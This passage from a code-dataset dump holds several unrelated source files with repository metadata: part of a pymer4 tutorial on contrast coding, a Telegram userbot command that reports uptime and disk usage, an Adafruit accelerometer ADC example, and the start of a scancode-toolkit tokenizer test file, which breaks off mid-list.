"DV_l ~ IV3_custom_lin + (IV3_custom_lin|Group)", data=df, family="binomial"
)
print(model.fit())
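###############################################################################
# As a quick numeric check on the scaling point above (an illustrative sketch,
# not part of the original tutorial): normalizing our [-1, 0, 1] contrast to
# unit length reproduces the ~[-0.707, 0, 0.707] weights R uses for its linear
# polynomial contrast.
import numpy as np

custom_lin = np.array([-1.0, 0.0, 1.0])
unit_lin = custom_lin / np.linalg.norm(custom_lin)
print(unit_lin)  # approximately [-0.7071, 0., 0.7071]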
###############################################################################
# A note on how contrasts in R work
# ---------------------------------
# .. note::
# This is just for folks curious about how contrasts in R work
#
# Specifying multiple custom contrasts in R has always been a point of confusion amongst users. This is because the :code:`contrasts()` command in R doesn't actually expect contrast weights (i.e. a design matrix) as one would intuit. Rather, it is made for generating contrast coding schemes, which are the inverse of the contrast weight matrix. For a longer explanation with examples see `this reference <https://rstudio-pubs-static.s3.amazonaws.com/65059_586f394d8eb84f84b1baaf56ffb6b47f.html>`_ and `this reference <https://github.com/ejolly/R/blob/master/Guides/Contrasts_in_R.md>`_. For these situations pymer4 offers a few utility functions in :code:`pymer4.utils` to convert between these matrix types if desired: :code:`R2con()` and :code:`con2R()`. A small numeric sketch of this inverse relationship follows below.
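###############################################################################
# The snippet below is an illustrative sketch (not part of the original
# tutorial) of that inverse relationship using plain numpy: stack the grand
# mean (intercept) and your desired contrast weights into a hypothesis matrix,
# invert it, and drop the intercept column to obtain the coding matrix that
# R's :code:`contrasts()` expects. The :code:`con2R()` and :code:`R2con()`
# helpers mentioned above automate this kind of conversion for you.
import numpy as np

# Hypothesis matrix for a 3-level factor: the first row is the intercept
# (grand mean), the remaining rows are the desired contrast weights
hypothesis = np.array(
    [
        [1 / 3, 1 / 3, 1 / 3],  # intercept / grand mean
        [1.0, -0.5, -0.5],  # level '1.0' vs the mean of '0.5' and '1.5'
        [0.0, 1.0, -1.0],  # level '0.5' vs level '1.5'
    ]
)

# The coding matrix is the inverse of the hypothesis matrix with the
# intercept column dropped
coding = np.linalg.inv(hypothesis)[:, 1:]
print(coding)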
avg_line_length: 69.398496 | max_line_length: 843 | alphanum_fraction: 0.638245 | is_comment_constant_removed: true | is_sharp_comment_removed: true
hexsha: 790af93b3af2ccf93c2c689dc115ea0a93b74347 | size: 777 | ext: py | lang: Python
repo_path: userbot/plugins/bot_stats.py | repo_name: felapr1804/TechnoAyanBOT | repo_head_hexsha: 74faac1aae1c350b0583a5e6405b414d6947162c | licenses: ["MIT"]
max_stars_count: null | max_issues_count: null | max_forks_count: null
# @ayushk780
# Big Thanks To Spechide and @TechnoAyanBoT
"""Counth: Avaible commands: .bstats
"""
import asyncio
from telethon import events
from uniborg.util import admin_cmd, humanbytes, get_readable_time
import shutil
import time
from userbot import botStartTime
@borg.on(admin_cmd(pattern=r"bstats"))
async def _(event):
if event.fwd_from:
return
currentTime = get_readable_time((time.time() - botStartTime))
total, used, free = shutil.disk_usage('.')
total = humanbytes(total)
used = humanbytes(used)
free = humanbytes(free)
stats = f'Bot Uptime: {currentTime}\n' \
f'Total disk space: {total}\n' \
f'Used: {used}\n' \
f'Free: {free}'
await event.edit(str(stats))
avg_line_length: 25.9 | max_line_length: 65 | alphanum_fraction: 0.646075
is_comment_constant_removed: true | is_sharp_comment_removed: true
hexsha: 790afb6e4dca3da075a86e2048b42967f34a0fb7 | size: 1,427 | ext: py | lang: Python
repo_path: Lights/adafruit-circuitpython-bundle-6.x-mpy-20210310/examples/lis3dh_adc.py | repo_name: IanSMoyes/SpiderPi | repo_head_hexsha: cc3469980ae87b92d0dc43c05dbd579f0fa8c4b1 | licenses: ["Apache-2.0"]
max_stars_count: 7 (2021-03-15T10:06:20.000Z to 2022-03-23T02:53:15.000Z) | max_issues_count: 5 (2021-04-27T18:21:11.000Z to 2021-05-02T14:17:14.000Z) | max_forks_count: null
# SPDX-FileCopyrightText: 2021 ladyada for Adafruit Industries
# SPDX-License-Identifier: MIT
# Analog to digital converter example.
# Will loop forever printing ADC channel 1 raw and mV values every second.
# NOTE the ADC can only read voltages in the range of ~900mV to 1800mV!
import time
import board
import busio
import adafruit_lis3dh
# Uncomment if using SPI
# import digitalio
# Hardware I2C setup. Use the CircuitPlayground built-in accelerometer if available;
# otherwise check I2C pins.
if hasattr(board, "ACCELEROMETER_SCL"):
i2c = busio.I2C(board.ACCELEROMETER_SCL, board.ACCELEROMETER_SDA)
lis3dh = adafruit_lis3dh.LIS3DH_I2C(i2c, address=0x19)
else:
i2c = busio.I2C(board.SCL, board.SDA)
lis3dh = adafruit_lis3dh.LIS3DH_I2C(i2c)
# Hardware SPI setup:
# spi = busio.SPI(board.SCK, board.MOSI, board.MISO)
# cs = digitalio.DigitalInOut(board.D5) # Set to correct CS pin!
# lis3dh = adafruit_lis3dh.LIS3DH_SPI(spi, cs)
# PyGamer I2C Setup:
# i2c = busio.I2C(board.SCL, board.SDA)
# lis3dh = adafruit_lis3dh.LIS3DH_I2C(i2c, address=0x19)
# Loop forever printing ADC readings.
while True:
# Read raw ADC value. Specify which ADC to read: 1, 2, or 3.
adc1_raw = lis3dh.read_adc_raw(1)
# Or read the ADC value in millivolts:
adc1_mV = lis3dh.read_adc_mV(1)
print("ADC 1 = {} ({} mV)".format(adc1_raw, adc1_mV))
time.sleep(1)
avg_line_length: 32.431818 | max_line_length: 85 | alphanum_fraction: 0.715487
is_comment_constant_removed: true | is_sharp_comment_removed: true
hexsha: 790afb8cdb3bfff53ceaff937c98d36c80e733ff | size: 79,390 | ext: py | lang: Python
repo_path: tests/textcode/test_analysis.py | repo_name: pombredanne/scancode-toolkit | repo_head_hexsha: 0d90a0498148997de94f92b00adf7e33079a41a8 | licenses: ["Apache-2.0", "CC0-1.0"]
max_stars_count: 3 (2015-07-01T15:08:33.000Z to 2015-11-05T03:15:36.000Z) | max_issues_count: null | max_forks_count: null
#
# Copyright (c) 2015 nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/scancode-toolkit/
# The ScanCode software is licensed under the Apache License version 2.0.
# Data generated with ScanCode require an acknowledgment.
# ScanCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with ScanCode or any ScanCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# ScanCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# ScanCode is a free software code scanning tool from nexB Inc. and others.
# Visit https://github.com/nexB/scancode-toolkit/ for support and download.
from __future__ import absolute_import, print_function
import json
import os
import codecs
import cPickle
from unittest.case import skipIf
from commoncode.testcase import FileBasedTesting
from textcode.analysis import DEFAULT_GAP
from textcode.analysis import NO_GAP
from textcode.analysis import InvalidGapError
from textcode.analysis import UnbalancedTemplateError
from textcode.analysis import Token
from textcode.analysis import word_splitter
from textcode.analysis import unigram_splitter
from textcode.analysis import unigram_tokenizer
from textcode.analysis import position_processor
from textcode.analysis import template_splitter
from textcode.analysis import template_processor
from textcode.analysis import ngram_to_token
from textcode.analysis import ngram_tokenizer
from textcode.analysis import tokens_ngram_processor
from textcode.analysis import doc_subset
from textcode.analysis import unicode_text_lines
from textcode.analysis import text_lines
#############################################################################
#
# Code style note: lines are not wrapped to PEP8 line length on purpose
# to keep the tests more readable
#
#############################################################################
class TestDocsubset(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
def test_doc_subset_single_line(self):
doc = '''A simple test
with multiple
lines
of text
'''.splitlines()
pos = Token(start=0, end=0, start_line=1, start_char=8, end_line=1, end_char=21)
expected = '''with multiple'''
tst = doc_subset(iter(doc), pos)
result = '\n'.join(tst)
assert expected == result
def test_doc_subset_multilines(self):
doc = '''0123456789\n0123456789\n'''.splitlines()
pos = Token(start=0, end=0, start_line=0, start_char=0, end_line=0, end_char=10)
expected = '0123456789'
tst = doc_subset(iter(doc), pos)
result = ''.join(tst)
assert expected == result
def test_doc_subset(self):
doc = iter('''A simple test
with multiple
lines
of text
'''.splitlines())
pos = Token(start=3, end=54, start_line=1, start_char=8, end_line=2, end_char=11)
expected = u'''with multiple
lin'''
tst = doc_subset(iter(doc), pos)
result = u'\n'.join(tst)
assert expected == result
class TestAnalysis(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
def test_text_lines_from_list_or_location_yield_same_results(self):
test_file = self.get_test_loc('analysis/bsd-new')
with open(test_file, 'rb') as inf:
test_strings_list = inf.read().splitlines(True)
# test when we are passing a location or a list
from_loc = list(text_lines(location=test_file))
from_list = list(text_lines(location=test_strings_list))
assert from_loc == from_list
class TestUnigrams(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
def test_unigrams_word_splitter_handles_empty_string(self):
text = iter([''])
result = list(unigram_splitter(text, splitter=word_splitter))
assert [] == result
def test_unigrams_word_splitter_handles_blank_lines(self):
text = iter([u' ', u'', u'\t '])
result = list(unigram_splitter(text, splitter=word_splitter))
assert [] == result
def test_unigrams_word_splitter_can_split(self):
text = iter(u'abc def \n GHI'.splitlines())
result = list(unigram_splitter(text, splitter=word_splitter))
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=3, value=u'abc'),
Token(start_line=0, end_line=0, start_char=4, end_char=7, value=u'def'),
Token(start_line=1, end_line=1, start_char=1, end_char=4, value=u'ghi'),
]
assert expected == result
def test_unigrams_word_splitter_handles_empty_iterable(self):
text = iter([])
result = list(unigram_splitter(text, splitter=word_splitter))
assert [] == result
def test_unigrams_template_splitter_handles_empty_string(self):
text = iter([''])
result = list(unigram_splitter(text, splitter=template_splitter))
assert [] == result
def test_unigrams_template_splitter_handles_blank_lines(self):
text = iter([' ', '', '\t '])
result = list(unigram_splitter(text, splitter=template_splitter))
assert [] == result
def test_unigrams_template_splitter_handles_empty_iterable(self):
text = iter([])
result = list(unigram_splitter(text, splitter=template_splitter))
assert [] == result
def test_unigrams_template_splitter_can_split(self):
text = iter(u'abc def \n GHI'.splitlines())
result = list(unigram_splitter(text, splitter=template_splitter))
assert [u'abc', u'def', u'ghi'] == [x.value for x in result]
def test_unigrams_template_splitter_can_split_templates(self):
text = u'abc def \n {{temp}} GHI'.splitlines()
result = list(unigram_splitter(text, splitter=template_splitter))
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=3, value=u'abc'),
Token(start_line=0, end_line=0, start_char=4, end_char=7, value=u'def'),
Token(start_line=1, end_line=1, start_char=1, end_char=3, value=u'{{'),
Token(start_line=1, end_line=1, start_char=3, end_char=7, value=u'temp'),
Token(start_line=1, end_line=1, start_char=7, end_char=9, value=u'}}'),
Token(start_line=1, end_line=1, start_char=10, end_char=13, value=u'ghi'),
]
assert expected == result
def test_position_processor(self):
tokens = [
Token(value=u'abc'),
Token(value=u'def'),
Token(value=u'temp'),
Token(value=u'ghi'),
]
expected = [
Token(value=u'abc', start=0, end=0),
Token(value=u'def', start=1, end=1),
Token(value=u'temp', start=2, end=2),
Token(value=u'ghi', start=3, end=3),
]
result = list(position_processor(tokens))
assert expected == result
def test_unigram_tokenizer(self):
inp = u'''Redistribution and use in source and binary forms, with or
without modification, are permitted provided that the following
conditions are met:
Redistributions of source code must retain the above
copyright notice, this list of conditions and the following
disclaimer.'''
tst = list(unigram_tokenizer(inp.splitlines(True)))
assert 39 == len(tst)
expected = u'''redistribution and use in source and binary forms with or
without modification are permitted provided that the following
conditions are met redistributions of source code must retain the above
copyright notice this list of conditions and the following
disclaimer'''.split()
result = [t.value for t in tst]
assert expected == result
class TestTemplates(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
def template_parsing(self, lines):
if isinstance(lines, basestring):
lines = lines.splitlines()
unigrams = unigram_splitter(lines, splitter=template_splitter)
return list(template_processor(unigrams))
def test_process_template_handles_empty_templates_using_default_gap(self):
lines = [u'ab{{}}cd']
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=6, end_char=8, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_recognizes_template_with_gap(self):
lines = u'ab{{10 nexb Company}}cd'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=10),
Token(start_line=0, end_line=0, start_char=21, end_char=23, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_raise_invalid_gap_exception(self):
lines = u'ab{{151 nexb Company}}cd'
self.assertRaises(InvalidGapError, self.template_parsing, lines)
def test_process_template_recognizes_template_with_maxgap(self):
lines = u'ab{{150 nexb Company}}cd'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=150),
Token(start_line=0, end_line=0, start_char=22, end_char=24, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_recognizes_template_with_only_gap(self):
lines = u'ab{{10}}cd'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=10),
Token(start_line=0, end_line=0, start_char=8, end_char=10, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_recognizes_template_with_only_gap_and_spaces(self):
lines = u'ab{{ 10 }}cd'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=10),
Token(start_line=0, end_line=0, start_char=16, end_char=18, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_set_default_gap_if_none_is_specified(self):
lines = u'ab{{nexb Company}}cd'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=18, end_char=20, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_set_default_gap_if_none_is_specified_ignoring_spaces(self):
lines = u'ab{{ \sdsdnexb Companysd }}cd'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=28, end_char=30, value=u'cd', gap=NO_GAP)
]
assert expected == self.template_parsing(lines)
def test_process_template_can_process_multiple_templatized_regions_with_default_gap(self):
lines = u'ab{{nexb Company}}cd {{second}}ef'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=18, end_char=20, value=u'cd', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=31, end_char=33, value=u'ef', gap=NO_GAP),
]
assert expected == self.template_parsing(lines)
def test_process_template_can_process_multiple_templatized_regions_with_default_gap_and_custom_gaps(self):
lines = u'ab{{nexb Company}}cd{{12 second}}ef{{12 second}}gh'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=18, end_char=20, value=u'cd', gap=12),
Token(start_line=0, end_line=0, start_char=33, end_char=35, value=u'ef', gap=12),
Token(start_line=0, end_line=0, start_char=48, end_char=50, value=u'gh', gap=NO_GAP),
]
assert expected == self.template_parsing(lines)
def test_process_template_handles_combination_of_well_formed_and_ill_formed_templates(self):
lines = u'ab{{c}}d}}ef'
expected = [
Token(start_line=0, end_line=0, start_char=0, end_char=2, value=u'ab', gap=DEFAULT_GAP),
Token(start_line=0, end_line=0, start_char=7, end_char=8, value=u'd', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=10, end_char=12, value=u'ef', gap=NO_GAP),
]
assert expected == self.template_parsing(lines)
def test_process_template_handles_empty_lines(self):
lines = u'\n\n'
expected = []
assert expected == self.template_parsing(lines)
def test_process_template_handles_None(self):
lines = None
expected = []
assert expected == self.template_parsing(lines)
def test_process_template_can_parse_simple_line(self):
lines = u'Licensed by {{12 nexB}} to you '
expected = u'licensed by to you'
result = u' '.join(x.value for x in self.template_parsing(lines))
assert expected == result
def test_process_template_does_not_throw_exception_for_illegal_pystache_templates(self):
lines = u'''Permission to use, copy, modify, and {{ /or : the
lines exist without or }} distribute this software...'''
self.template_parsing(lines)
def test_process_template_handles_unicode_text_correctly(self):
expected = [
Token(start_line=0, end_line=0, start_char=1, end_char=4, value=u'ist', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=5, end_char=10, value=u'freie', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=11, end_char=19, value=u'software', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=21, end_char=24, value=u'sie', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=25, end_char=31, value=u'k\xf6nnen', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=32, end_char=34, value=u'es', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=35, end_char=40, value=u'unter', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=41, end_char=44, value=u'den', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=45, end_char=56, value=u'bedingungen', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=57, end_char=60, value=u'der', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=61, end_char=64, value=u'gnu', gap=NO_GAP),
Token(start_line=1, end_line=1, start_char=1, end_char=8, value=u'general', gap=NO_GAP),
Token(start_line=1, end_line=1, start_char=10, end_char=11, value=u'n', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=1, end_char=7, value=u'public', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=8, end_char=15, value=u'license', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=17, end_char=20, value=u'wie', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=21, end_char=24, value=u'von', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=25, end_char=28, value=u'der', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=29, end_char=33, value=u'free', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=34, end_char=42, value=u'software', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=43, end_char=53, value=u'foundation', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=54, end_char=68, value=u'ver\xf6ffentlicht', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=1, end_char=12, value=u'weitergeben', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=13, end_char=16, value=u'und', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=17, end_char=21, value=u'oder', gap=NO_GAP),
Token(start_line=3, end_line=3, start_char=23, end_char=24, value=u'n', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=1, end_char=13, value=u'modifizieren', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=15, end_char=23, value=u'entweder', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=24, end_char=29, value=u'gem\xe4\xdf', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=30, end_char=37, value=u'version', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=38, end_char=39, value=u'3', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=40, end_char=43, value=u'der', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=44, end_char=50, value=u'lizenz', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=51, end_char=55, value=u'oder', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=57, end_char=61, value=u'nach', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=62, end_char=67, value=u'ihrer', gap=NO_GAP),
Token(start_line=4, end_line=4, start_char=68, end_char=74, value=u'option', gap=NO_GAP),
Token(start_line=5, end_line=5, start_char=1, end_char=6, value=u'jeder', gap=NO_GAP),
Token(start_line=5, end_line=5, start_char=7, end_char=15, value=u'sp\xe4teren', gap=NO_GAP),
Token(start_line=5, end_line=5, start_char=17, end_char=18, value=u'n', gap=NO_GAP),
Token(start_line=6, end_line=6, start_char=1, end_char=8, value=u'version', gap=NO_GAP),
Token(start_line=6, end_line=6, start_char=10, end_char=11, value=u'n', gap=NO_GAP),
Token(start_line=7, end_line=7, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=1, end_char=4, value=u'die', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=5, end_char=21, value=u'ver\xf6ffentlichung', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=22, end_char=25, value=u'von', gap=DEFAULT_GAP),
Token(start_line=8, end_line=8, start_char=38, end_char=45, value=u'erfolgt', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=46, end_char=48, value=u'in', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=49, end_char=52, value=u'der', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=53, end_char=61, value=u'hoffnung', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=63, end_char=66, value=u'da\xdf', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=67, end_char=69, value=u'es', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=70, end_char=75, value=u'ihnen', gap=NO_GAP),
Token(start_line=8, end_line=8, start_char=76, end_char=79, value=u'von', gap=NO_GAP),
Token(start_line=9, end_line=9, start_char=1, end_char=7, value=u'nutzen', gap=NO_GAP),
Token(start_line=9, end_line=9, start_char=9, end_char=10, value=u'n', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=1, end_char=5, value=u'sein', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=6, end_char=10, value=u'wird', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=12, end_char=16, value=u'aber', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=17, end_char=21, value=u'ohne', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=22, end_char=32, value=u'irgendeine', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=33, end_char=41, value=u'garantie', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=43, end_char=48, value=u'sogar', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=49, end_char=53, value=u'ohne', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=54, end_char=57, value=u'die', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=58, end_char=67, value=u'implizite', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=68, end_char=76, value=u'garantie', gap=NO_GAP),
Token(start_line=11, end_line=11, start_char=1, end_char=4, value=u'der', gap=NO_GAP),
Token(start_line=11, end_line=11, start_char=5, end_char=15, value=u'marktreife', gap=NO_GAP),
Token(start_line=11, end_line=11, start_char=17, end_char=18, value=u'n', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=1, end_char=5, value=u'oder', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=6, end_char=9, value=u'der', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=10, end_char=24, value=u'verwendbarkeit', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=25, end_char=28, value=u'f\xfcr', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=29, end_char=34, value=u'einen', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=35, end_char=45, value=u'bestimmten', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=46, end_char=51, value=u'zweck', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=53, end_char=60, value=u'details', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=61, end_char=67, value=u'finden', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=68, end_char=71, value=u'sie', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=72, end_char=74, value=u'in', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=1, end_char=4, value=u'der', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=5, end_char=8, value=u'gnu', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=9, end_char=16, value=u'general', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=18, end_char=19, value=u'n', gap=NO_GAP),
Token(start_line=14, end_line=14, start_char=1, end_char=7, value=u'public', gap=NO_GAP),
Token(start_line=14, end_line=14, start_char=8, end_char=15, value=u'license', gap=NO_GAP),
Token(start_line=14, end_line=14, start_char=17, end_char=18, value=u'n', gap=NO_GAP),
Token(start_line=15, end_line=15, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=1, end_char=4, value=u'sie', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=5, end_char=12, value=u'sollten', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=13, end_char=16, value=u'ein', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=17, end_char=25, value=u'exemplar', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=26, end_char=29, value=u'der', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=30, end_char=33, value=u'gnu', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=34, end_char=41, value=u'general', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=42, end_char=48, value=u'public', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=49, end_char=56, value=u'license', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=57, end_char=65, value=u'zusammen', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=66, end_char=69, value=u'mit', gap=DEFAULT_GAP),
Token(start_line=17, end_line=17, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=1, end_char=9, value=u'erhalten', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=10, end_char=15, value=u'haben', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=17, end_char=22, value=u'falls', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=23, end_char=28, value=u'nicht', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=30, end_char=39, value=u'schreiben', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=40, end_char=43, value=u'sie', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=44, end_char=46, value=u'an', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=47, end_char=50, value=u'die', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=51, end_char=55, value=u'free', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=56, end_char=64, value=u'software', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=65, end_char=75, value=u'foundation', gap=NO_GAP),
Token(start_line=19, end_line=19, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=1, end_char=4, value=u'inc', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=7, end_char=9, value=u'51', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=10, end_char=18, value=u'franklin', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=19, end_char=21, value=u'st', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=23, end_char=28, value=u'fifth', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=29, end_char=34, value=u'floor', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=36, end_char=42, value=u'boston', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=44, end_char=46, value=u'ma', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=47, end_char=52, value=u'02110', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=54, end_char=57, value=u'usa', gap=NO_GAP),
]
test_file = self.get_test_loc('analysis/unicode/12180.atxt')
with codecs.open(test_file, encoding='utf-8') as test:
lines = test.read().splitlines()
result = list(self.template_parsing(lines))
assert expected == result
def test_process_template_can_handle_long_text(self):
expected = [
Token(start_line=0, end_line=0, start_char=14, end_char=17, value=u'ist', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=18, end_char=23, value=u'freie', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=24, end_char=32, value=u'software', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=34, end_char=37, value=u'sie', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=38, end_char=44, value=u'k\xf6nnen', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=45, end_char=47, value=u'es', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=48, end_char=53, value=u'unter', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=54, end_char=57, value=u'den', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=58, end_char=69, value=u'bedingungen', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=70, end_char=73, value=u'der', gap=NO_GAP),
Token(start_line=0, end_line=0, start_char=74, end_char=77, value=u'gnu', gap=NO_GAP),
Token(start_line=1, end_line=1, start_char=1, end_char=8, value=u'general', gap=NO_GAP),
Token(start_line=1, end_line=1, start_char=10, end_char=11, value=u'n', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=1, end_char=7, value=u'public', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=8, end_char=15, value=u'license', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=17, end_char=20, value=u'wie', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=21, end_char=24, value=u'von', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=25, end_char=28, value=u'der', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=29, end_char=33, value=u'free', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=34, end_char=42, value=u'software', gap=NO_GAP),
Token(start_line=2, end_line=2, start_char=43, end_char=53, value=u'foundation', gap=NO_GAP),
